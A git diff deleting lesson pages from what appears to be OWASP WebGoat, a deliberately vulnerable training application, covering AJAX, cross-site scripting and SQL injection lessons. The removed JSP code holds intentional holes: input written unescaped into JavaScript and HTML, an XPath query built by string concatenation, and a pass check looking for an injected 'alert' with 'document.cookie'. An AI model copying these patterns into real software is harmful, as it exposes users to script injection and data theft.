diff --git a/src/main/webapp/lessons/Ajax/eval.jsp b/src/main/webapp/lessons/Ajax/eval.jsp
deleted file mode 100644
index f288f7637..000000000
--- a/src/main/webapp/lessons/Ajax/eval.jsp
+++ /dev/null
@@ -1,38 +0,0 @@
-<%@ page language="java" contentType="text/html; charset=ISO-8859-1" import="java.util.regex.*" import="org.owasp.webgoat.lessons.DangerousEval"
- pageEncoding="ISO-8859-1"%>
-<%
-String action = request.getParameter("action");
-String field1 = request.getParameter("field1");
-String field2 = request.getParameter("field2");
-String regex1 = "^[0-9]{3}$";// any three digits
-Pattern pattern1 = Pattern.compile(regex1);
-
-if(action == null) action = "Purchase";
-if(field1 == null) field1 = "123";
-if(field2 == null) field2 = "-1";
-
-/** For security reasons, we remove all '<' and '>' characters to prevent XSS **/
-// Thank you Victor Bucutea for noticing replaceAll only cleans taint to the return value.
-field1 = field1.replaceAll("<", "");
-field1 = field1.replaceAll(">", "");
-field2 = field2.replaceAll("<", "");
-field2 = field2.replaceAll(">", "");
-
-if("Purchase".equals(action))
-{
- if(!pattern1.matcher(field1).matches())
- {
- /** If they supplied the right attack, pass them **/
- if(field1.indexOf("');") != -1 && field1.indexOf("alert") != -1 && field1.indexOf("document.cookie") != -1)
- {
- session.setAttribute(DangerousEval.PASSED, "true");
- }
-
- out.write("alert('Whoops: You entered an incorrect access code of \"" + field1 + "\"');");
- }
- else
- {
- out.write("alert('Purchase completed successfully with credit card \"" + field2 + "\" and access code \"" + field1 + "\"');");
- }
-}
-%>
diff --git a/src/main/webapp/lessons/Ajax/images/lesson1_header.jpg b/src/main/webapp/lessons/Ajax/images/lesson1_header.jpg
deleted file mode 100644
index 60a809af0..000000000
Binary files a/src/main/webapp/lessons/Ajax/images/lesson1_header.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/Ajax/images/lesson1_workspace.jpg b/src/main/webapp/lessons/Ajax/images/lesson1_workspace.jpg
deleted file mode 100644
index 292d25654..000000000
Binary files a/src/main/webapp/lessons/Ajax/images/lesson1_workspace.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/Ajax/instructor/clientSideFiltering_i.jsp b/src/main/webapp/lessons/Ajax/instructor/clientSideFiltering_i.jsp
deleted file mode 100644
index e6217ecb6..000000000
--- a/src/main/webapp/lessons/Ajax/instructor/clientSideFiltering_i.jsp
+++ /dev/null
@@ -1,111 +0,0 @@
-
-<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
- pageEncoding="ISO-8859-1"%>
-
-<%@ page import="java.io.*, javax.xml.xpath.*, org.xml.sax.InputSource,org.w3c.dom.*,org.apache.ecs.html.* " %>
-
-<%
-
-String userId = request.getParameter("userId");
-
-
- NodeList nodes = null;
-
-
-
- File d = new File(this.getServletContext().getRealPath("lessons/Ajax/employees.xml"));
-
- if(d.exists()){
- System.out.print("File does exist");
- }
- else{
- System.out.print("File DOES NOT exist");
- }
-
- System.out.println(d.getAbsolutePath());
- XPathFactory factory = XPathFactory.newInstance();
- XPath xPath = factory.newXPath();
- InputSource inputSource = new InputSource(new FileInputStream(d));
-
-
- StringBuffer sb = new StringBuffer();
-
- sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/UserID | ");
- sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/FirstName | ");
- sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/LastName | ");
- sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/SSN | ");
- sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/Salary ");
-
- String expression = sb.toString();
-
- System.out.print("expression:" + expression);
-
-
-
-
-
- nodes = (NodeList) xPath.evaluate(expression, inputSource,
- XPathConstants.NODESET);
- int nodesLength = nodes.getLength();
-
-
- System.out.println("nodesLength:" + nodesLength);
-
- TR tr;
-
- int COLUMNS = 5;
-
- Table t2 = null;
- if (nodesLength > 0)
- {
- t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(
- 1).setWidth("90%").setAlign("center");
- tr = new TR();
- tr.addElement(new TD().addElement("UserID"));
- tr.addElement(new TD().addElement("First Name"));
- tr.addElement(new TD().addElement("Last Name"));
- tr.addElement(new TD().addElement("SSN"));
- tr.addElement(new TD().addElement("Salary"));
- t2.addElement(tr);
- }
-
-
-
- tr = new TR();
-
- for (int i = 0; i < nodesLength; i++)
- {
- Node node = nodes.item(i);
-
- if(i%COLUMNS==0){
- tr = new TR();
- tr.setID(node.getTextContent());
- //tr.setStyle("display: none");
- }
-
- tr.addElement(new TD().addElement(node.getTextContent()));
-
- if(i%COLUMNS==(COLUMNS-1)){
- t2.addElement(tr);
- }
- }
-
- if(t2 != null){
- out.println(t2.toString());
- }
- else{
- out.println("No Results");
- }
-
-
-
-
-
-
-
-
-
-
-
-%>
-
diff --git a/src/main/webapp/lessons/Ajax/sameOrigin.jsp b/src/main/webapp/lessons/Ajax/sameOrigin.jsp
deleted file mode 100644
index 26e652898..000000000
--- a/src/main/webapp/lessons/Ajax/sameOrigin.jsp
+++ /dev/null
@@ -1 +0,0 @@
-Good Response
\ No newline at end of file
diff --git a/src/main/webapp/lessons/ConfManagement/config.jsp b/src/main/webapp/lessons/ConfManagement/config.jsp
deleted file mode 100644
index 7abe1430f..000000000
--- a/src/main/webapp/lessons/ConfManagement/config.jsp
+++ /dev/null
@@ -1,19 +0,0 @@
-<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
- pageEncoding="ISO-8859-1"%>
-<%@page import="org.owasp.webgoat.session.WebSession"%>
-<%
-WebSession webSession = ((WebSession)session.getAttribute("websession"));
-%>
-
-
-
-
-Configuration Page
-
-
-<% response.sendRedirect(webSession.getCurrentLesson().getLink() +
- "&succeeded=yes");
-%>
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/CrossSiteScripting/CrossSiteScripting.css b/src/main/webapp/lessons/CrossSiteScripting/CrossSiteScripting.css
deleted file mode 100644
index fad6880ad..000000000
--- a/src/main/webapp/lessons/CrossSiteScripting/CrossSiteScripting.css
+++ /dev/null
@@ -1,14 +0,0 @@
-#lesson_wrapper {height: 435px;width: 500px;}
-#lesson_header {background-image: url(lessons/CrossSiteScripting/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
-.lesson_workspace {background-image: url(lessons/CrossSiteScripting/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
-.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
-#lesson_buttons_bottom {height: 20px;width: 460px;}
-#lesson_b_b_left {width: 300px;float: left;}
-#lesson_b_b_right input {width: 100px;float: right;}
-.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
-.lesson_workspace { }
-.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
-.lesson_text_db {color: #0066FF}
-#lesson_login {background-image: url(lessons/CrossSiteScripting/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
-#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
-#lesson_search {background-image: url(lessons/CrossSiteScripting/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/src/main/webapp/lessons/CrossSiteScripting/CrossSiteScripting.jsp b/src/main/webapp/lessons/CrossSiteScripting/CrossSiteScripting.jsp
deleted file mode 100644
index a571c370c..000000000
--- a/src/main/webapp/lessons/CrossSiteScripting/CrossSiteScripting.jsp
+++ /dev/null
@@ -1,26 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting"
- errorPage="" %>
-
-<%
-WebSession webSession = ((WebSession)session.getAttribute("websession"));
-CrossSiteScripting currentLesson = (CrossSiteScripting) webSession.getCurrentLesson();
-%>
-
-
-
- <%
- String subViewPage = currentLesson.getPage(webSession);
- if (subViewPage != null)
- {
- //System.out.println("Including sub view page: " + subViewPage);
- %>
-
- <%
- }
- %>
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/CrossSiteScripting/EditProfile.jsp b/src/main/webapp/lessons/CrossSiteScripting/EditProfile.jsp
deleted file mode 100644
index 13952f612..000000000
--- a/src/main/webapp/lessons/CrossSiteScripting/EditProfile.jsp
+++ /dev/null
@@ -1,134 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- Employee employee = (Employee) session.getAttribute("CrossSiteScripting.Employee");
-%>
- Welcome Back <%=webSession.getUserNameInLesson()%>
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/CrossSiteScripting/ListStaff.jsp b/src/main/webapp/lessons/CrossSiteScripting/ListStaff.jsp
deleted file mode 100644
index 4f7acd643..000000000
--- a/src/main/webapp/lessons/CrossSiteScripting/ListStaff.jsp
+++ /dev/null
@@ -1,56 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- int myUserId = webSession.getUserIdInLesson();
-%>
- Welcome Back <%=webSession.getUserNameInLesson()%> - Staff Listing Page
-
-
-
- Select from the list below
-
-
-
-
-
diff --git a/src/main/webapp/lessons/CrossSiteScripting/Login.jsp b/src/main/webapp/lessons/CrossSiteScripting/Login.jsp
deleted file mode 100644
index 4479289e9..000000000
--- a/src/main/webapp/lessons/CrossSiteScripting/Login.jsp
+++ /dev/null
@@ -1,32 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting"
- errorPage="" %>
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/CrossSiteScripting/SearchStaff.jsp b/src/main/webapp/lessons/CrossSiteScripting/SearchStaff.jsp
deleted file mode 100644
index 4e1f6885c..000000000
--- a/src/main/webapp/lessons/CrossSiteScripting/SearchStaff.jsp
+++ /dev/null
@@ -1,22 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting"
- errorPage="" %>
-
- <%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- String searchedName = request.getParameter(CrossSiteScripting.SEARCHNAME);
- if (searchedName != null)
- {
- %>
- Employee <%=searchedName%> not found.
- <%
- }
- %>
-
- Name
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/CrossSiteScripting/ViewProfile.jsp b/src/main/webapp/lessons/CrossSiteScripting/ViewProfile.jsp
deleted file mode 100644
index 46822d95e..000000000
--- a/src/main/webapp/lessons/CrossSiteScripting/ViewProfile.jsp
+++ /dev/null
@@ -1,160 +0,0 @@
-
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting" errorPage="" %>
-<%
-WebSession webSession = ((WebSession)session.getAttribute("websession"));
- Employee employee = (Employee) session.getAttribute("CrossSiteScripting." + CrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY);
- CrossSiteScripting lesson = (CrossSiteScripting) webSession.getCurrentLesson();
-// int myUserId = getIntSessionAttribute(webSession, "CrossSiteScripting." + CrossSiteScripting.USER_ID);
-%>
- Welcome Back <%=webSession.getUserNameInLesson()%>
-
-
-
- First Name:
-
-
- <%=employee.getFirstName()%>
-
-
- Last Name:
-
-
- <%=employee.getLastName()%>
-
-
-
- Street:
-
-
-
-
- <%=employee.getAddress1()%>
-
-
- City/State:
-
- <%=employee.getAddress2()%>
-
-
-
- Phone:
-
-
- <%=employee.getPhoneNumber()%>
-
-
- Start Date:
-
-
- <%=employee.getStartDate()%>
-
-
-
- SSN:
-
-
- <%=employee.getSsn()%>
-
-
- Salary:
-
-
- <%=employee.getSalary()%>
-
-
-
- Credit Card:
-
-
- <%=employee.getCcn()%>
-
-
- Credit Card Limit:
-
-
- <%=employee.getCcnLimit()%>
-
-
-
- Comments:
-
-
-
-
- <%=lesson.htmlEncode(webSession, employee.getPersonalDescription())%>
-
-
- Manager:
-
-
- <%=employee.getManager()%>
-
-
-
- Disciplinary Explanation:
-
-
- <%=employee.getDisciplinaryActionNotes()%>
-
-
- Disciplinary Action Dates:
-
-
- <%=employee.getDisciplinaryActionDate()%>
-
-
-
-
-
diff --git a/src/main/webapp/lessons/CrossSiteScripting/error.jsp b/src/main/webapp/lessons/CrossSiteScripting/error.jsp
deleted file mode 100644
index 5af0a45dc..000000000
--- a/src/main/webapp/lessons/CrossSiteScripting/error.jsp
+++ /dev/null
@@ -1,3 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- errorPage="" %>
- An error has occurred.
diff --git a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_SearchWindow.jpg b/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_SearchWindow.jpg
deleted file mode 100644
index 39e1ed80d..000000000
Binary files a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_SearchWindow.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_header.jpg b/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_header.jpg
deleted file mode 100644
index 60a809af0..000000000
Binary files a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_header.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_loginWindow.jpg b/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_loginWindow.jpg
deleted file mode 100644
index c91f8a052..000000000
Binary files a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_loginWindow.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_menu.jpg b/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_menu.jpg
deleted file mode 100644
index 2c9512571..000000000
Binary files a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_menu.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_workspace.jpg b/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_workspace.jpg
deleted file mode 100644
index 292d25654..000000000
Binary files a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_workspace.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/DBCrossSiteScripting.css b/src/main/webapp/lessons/DBCrossSiteScripting/DBCrossSiteScripting.css
deleted file mode 100644
index 8ffcd6a7e..000000000
--- a/src/main/webapp/lessons/DBCrossSiteScripting/DBCrossSiteScripting.css
+++ /dev/null
@@ -1,14 +0,0 @@
-#lesson_wrapper {height: 435px;width: 500px;}
-#lesson_header {background-image: url(lessons/CrossSiteScripting/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
-.lesson_workspace {background-image: url(lessons/CrossSiteScripting/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
-.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
-#lesson_buttons_bottom {height: 20px;width: 460px;}
-#lesson_b_b_left {width: 300px;float: left;}
-#lesson_b_b_right input {width: 100px;float: right;}
-.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
-.lesson_workspace { }
-.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
-.lesson_text_db {color: #0066FF}
-#lesson_login {background-image: url(lessons/CrossSiteScripting/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
-#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
-#lesson_search {background-image: url(lessons/DBCrossSiteScripting/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/DBCrossSiteScripting.jsp b/src/main/webapp/lessons/DBCrossSiteScripting/DBCrossSiteScripting.jsp
deleted file mode 100644
index 7d6ec61e0..000000000
--- a/src/main/webapp/lessons/DBCrossSiteScripting/DBCrossSiteScripting.jsp
+++ /dev/null
@@ -1,26 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting"
- errorPage="" %>
-
-<%
-WebSession webSession = ((WebSession)session.getAttribute("websession"));
-DBCrossSiteScripting currentLesson = (DBCrossSiteScripting) webSession.getCurrentLesson();
-%>
-
-
-
- <%
- String subViewPage = currentLesson.getPage(webSession);
- if (subViewPage != null)
- {
- //System.out.println("Including sub view page: " + subViewPage);
- %>
-
- <%
- }
- %>
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/EditProfile.jsp b/src/main/webapp/lessons/DBCrossSiteScripting/EditProfile.jsp
deleted file mode 100644
index 42f5f08e1..000000000
--- a/src/main/webapp/lessons/DBCrossSiteScripting/EditProfile.jsp
+++ /dev/null
@@ -1,134 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- Employee employee = (Employee) session.getAttribute("DBCrossSiteScripting.Employee");
-%>
- Welcome Back <%=webSession.getUserNameInLesson()%>
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/ListStaff.jsp b/src/main/webapp/lessons/DBCrossSiteScripting/ListStaff.jsp
deleted file mode 100644
index a7c831377..000000000
--- a/src/main/webapp/lessons/DBCrossSiteScripting/ListStaff.jsp
+++ /dev/null
@@ -1,56 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- int myUserId = webSession.getUserIdInLesson();
-%>
- Welcome Back <%=webSession.getUserNameInLesson()%> - Staff Listing Page
-
-
-
- Select from the list below
-
-
-
-
-
diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/Login.jsp b/src/main/webapp/lessons/DBCrossSiteScripting/Login.jsp
deleted file mode 100644
index 9daefd1b6..000000000
--- a/src/main/webapp/lessons/DBCrossSiteScripting/Login.jsp
+++ /dev/null
@@ -1,32 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting"
- errorPage="" %>
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/SearchStaff.jsp b/src/main/webapp/lessons/DBCrossSiteScripting/SearchStaff.jsp
deleted file mode 100644
index ddc5519b5..000000000
--- a/src/main/webapp/lessons/DBCrossSiteScripting/SearchStaff.jsp
+++ /dev/null
@@ -1,22 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting"
- errorPage="" %>
-
- <%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- String searchedName = request.getParameter(DBCrossSiteScripting.SEARCHNAME);
- if (searchedName != null)
- {
- %>
- Employee <%=searchedName%> not found.
- <%
- }
- %>
-
- Name
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/ViewProfile.jsp b/src/main/webapp/lessons/DBCrossSiteScripting/ViewProfile.jsp
deleted file mode 100644
index ce0fee2b2..000000000
--- a/src/main/webapp/lessons/DBCrossSiteScripting/ViewProfile.jsp
+++ /dev/null
@@ -1,151 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting" errorPage="" %>
-<%
-WebSession webSession = ((WebSession)session.getAttribute("websession"));
- Employee employee = (Employee) session.getAttribute("DBCrossSiteScripting." + DBCrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY);
-%>
- Welcome Back <%=webSession.getUserNameInLesson()%>
-
-
-
- First Name:
-
-
- <%=employee.getFirstName()%>
-
-
- Last Name:
-
-
- <%=employee.getLastName()%>
-
-
-
- Street:
-
-
- <%=employee.getAddress1()%>
-
-
- City/State:
-
- <%=employee.getAddress2()%>
-
-
-
- Phone:
-
-
- <%=employee.getPhoneNumber()%>
-
-
- Start Date:
-
-
- <%=employee.getStartDate()%>
-
-
-
- SSN:
-
-
- <%=employee.getSsn()%>
-
-
- Salary:
-
-
- <%=employee.getSalary()%>
-
-
-
- Credit Card:
-
-
- <%=employee.getCcn()%>
-
-
- Credit Card Limit:
-
-
- <%=employee.getCcnLimit()%>
-
-
-
- Comments:
-
-
- <%=employee.getPersonalDescription()%>
-
-
- Manager:
-
-
- <%=employee.getManager()%>
-
-
-
- Disciplinary Explanation:
-
-
- <%=employee.getDisciplinaryActionNotes()%>
-
-
- Disciplinary Action Dates:
-
-
- <%=employee.getDisciplinaryActionDate()%>
-
-
-
-
-
diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/error.jsp b/src/main/webapp/lessons/DBCrossSiteScripting/error.jsp
deleted file mode 100644
index 5af0a45dc..000000000
--- a/src/main/webapp/lessons/DBCrossSiteScripting/error.jsp
+++ /dev/null
@@ -1,3 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- errorPage="" %>
- An error has occurred.
diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_SearchWindow.jpg b/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_SearchWindow.jpg
deleted file mode 100644
index 39e1ed80d..000000000
Binary files a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_SearchWindow.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_header.jpg b/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_header.jpg
deleted file mode 100644
index 60a809af0..000000000
Binary files a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_header.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_loginWindow.jpg b/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_loginWindow.jpg
deleted file mode 100644
index c91f8a052..000000000
Binary files a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_loginWindow.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_menu.jpg b/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_menu.jpg
deleted file mode 100644
index 2c9512571..000000000
Binary files a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_menu.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_workspace.jpg b/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_workspace.jpg
deleted file mode 100644
index 292d25654..000000000
Binary files a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_workspace.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/DBSQLInjection/DBSQLInjection.css b/src/main/webapp/lessons/DBSQLInjection/DBSQLInjection.css
deleted file mode 100644
index b0b84331b..000000000
--- a/src/main/webapp/lessons/DBSQLInjection/DBSQLInjection.css
+++ /dev/null
@@ -1,14 +0,0 @@
-#lesson_wrapper {height: 435px;width: 500px;}
-#lesson_header {background-image: url(lessons/DBSQLInjection/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
-.lesson_workspace {background-image: url(lessons/DBSQLInjection/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
-.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
-#lesson_buttons_bottom {height: 20px;width: 460px;}
-#lesson_b_b_left {width: 300px;float: left;}
-#lesson_b_b_right input {width: 100px;float: right;}
-.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
-.lesson_workspace { }
-.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
-.lesson_text_db {color: #0066FF}
-#lesson_login {background-image: url(lessons/DBSQLInjection/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
-#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
-#lesson_search {background-image: url(lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/src/main/webapp/lessons/DBSQLInjection/DBSQLInjection.jsp b/src/main/webapp/lessons/DBSQLInjection/DBSQLInjection.jsp
deleted file mode 100644
index 7bf2fc250..000000000
--- a/src/main/webapp/lessons/DBSQLInjection/DBSQLInjection.jsp
+++ /dev/null
@@ -1,26 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection"
- errorPage="" %>
-
-<%
-WebSession webSession = ((WebSession)session.getAttribute("websession"));
-DBSQLInjection currentLesson = (DBSQLInjection) webSession.getCurrentLesson();
-%>
-
-
-
- <%
- String subViewPage = currentLesson.getPage(webSession);
- if (subViewPage != null)
- {
- //System.out.println("Including sub view page: " + subViewPage);
- %>
-
- <%
- }
- %>
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/DBSQLInjection/EditProfile.jsp b/src/main/webapp/lessons/DBSQLInjection/EditProfile.jsp
deleted file mode 100644
index 92abe249f..000000000
--- a/src/main/webapp/lessons/DBSQLInjection/EditProfile.jsp
+++ /dev/null
@@ -1,133 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- Employee employee = (Employee) session.getAttribute("DBSQLInjection.Employee");
-%>
- Welcome Back <%=webSession.getUserNameInLesson()%>
-
diff --git a/src/main/webapp/lessons/DBSQLInjection/ListStaff.jsp b/src/main/webapp/lessons/DBSQLInjection/ListStaff.jsp
deleted file mode 100644
index 3691a8280..000000000
--- a/src/main/webapp/lessons/DBSQLInjection/ListStaff.jsp
+++ /dev/null
@@ -1,57 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- int myUserId = webSession.getUserIdInLesson();
-%>
- Welcome Back <%=webSession.getUserNameInLesson()%> - Staff Listing Page
-
-
-
- Select from the list below
-
-
-
-
-
-
diff --git a/src/main/webapp/lessons/DBSQLInjection/Login.jsp b/src/main/webapp/lessons/DBSQLInjection/Login.jsp
deleted file mode 100644
index 4807f7d9c..000000000
--- a/src/main/webapp/lessons/DBSQLInjection/Login.jsp
+++ /dev/null
@@ -1,32 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection"
- errorPage="" %>
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/DBSQLInjection/SearchStaff.jsp b/src/main/webapp/lessons/DBSQLInjection/SearchStaff.jsp
deleted file mode 100644
index 0c42a5a32..000000000
--- a/src/main/webapp/lessons/DBSQLInjection/SearchStaff.jsp
+++ /dev/null
@@ -1,22 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection"
- errorPage="" %>
-
- <%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- String searchedName = request.getParameter(DBSQLInjection.SEARCHNAME);
- if (searchedName != null)
- {
- %>
- Employee <%=searchedName%> not found.
- <%
- }
- %>
-
- Name
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/DBSQLInjection/ViewProfile.jsp b/src/main/webapp/lessons/DBSQLInjection/ViewProfile.jsp
deleted file mode 100644
index bd9151a63..000000000
--- a/src/main/webapp/lessons/DBSQLInjection/ViewProfile.jsp
+++ /dev/null
@@ -1,154 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection"
